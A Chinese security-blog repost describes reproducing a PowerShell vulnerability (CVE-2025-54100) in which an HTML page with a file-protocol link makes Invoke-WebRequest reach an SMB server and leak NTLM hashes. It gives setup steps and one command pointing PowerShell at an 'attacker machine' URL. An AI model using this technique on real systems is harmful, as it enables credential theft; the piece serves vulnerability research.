文章总结： 本文复现PowerShellCVE-2025-54100漏洞，利用包含file协议的HTML页面，诱导PowerShell使用Invoke-WebRequest请求。解析时触发对SMB服务的访问，导致NTLM哈希泄露。文档详细提供了POC代码、搭建HTTP与SMB服务的步骤，成功验证了NTLMSSP捕获过程。 综合评分： 83 文章分类： 漏洞POC,漏洞分析,渗透测试,红队

以上POC另存为1.html

启一个http服务

启动SMB服务

powershell Invoke-WebRequest -Uri http://攻击机/1.html

成功获取NTLM SSP

往期推荐

[安全研究篇]关于微软powershell零日漏洞的POC

[代码审计-新0day]华天动力OA存在多个SQL注入漏洞

记代码审计出的几个新0day

点个「在看」你最好看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全 静师傅《powershell-CVE-2025-54100漏洞POC补充复现》